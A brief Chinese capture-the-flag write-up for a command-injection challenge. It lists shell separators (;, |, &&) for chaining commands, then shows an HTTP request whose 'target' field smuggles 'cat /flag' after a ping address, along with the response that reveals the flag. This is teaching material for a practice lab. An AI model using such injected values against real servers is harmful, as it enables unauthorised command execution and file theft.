知识点
命令注入方式
| 命令 |
方法 |
| Whoami;id |
多语句执行 |
| whoami|id |
利用管道符,不输出前者内容 |
| whoami&&id |
多语句执行 |
解题思路
POST / HTTP/1.1Host: e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cnContent-Length: 26Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cnContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://e3c2b7d9-2f25-4a03-a142-00cd3760e296.node3.buuoj.cn/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: closetarget=127.0.0.1|cat /flag
返回结果
HTTP/1.1 200 OKServer: openrestyDate: Thu, 17 Sep 2020 12:33:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 666Connection: closeX-Powered-By: PHP/7.3.13.......flag{7b042344-6fec-4f7d-a3f5-c43c4c252dd2}.......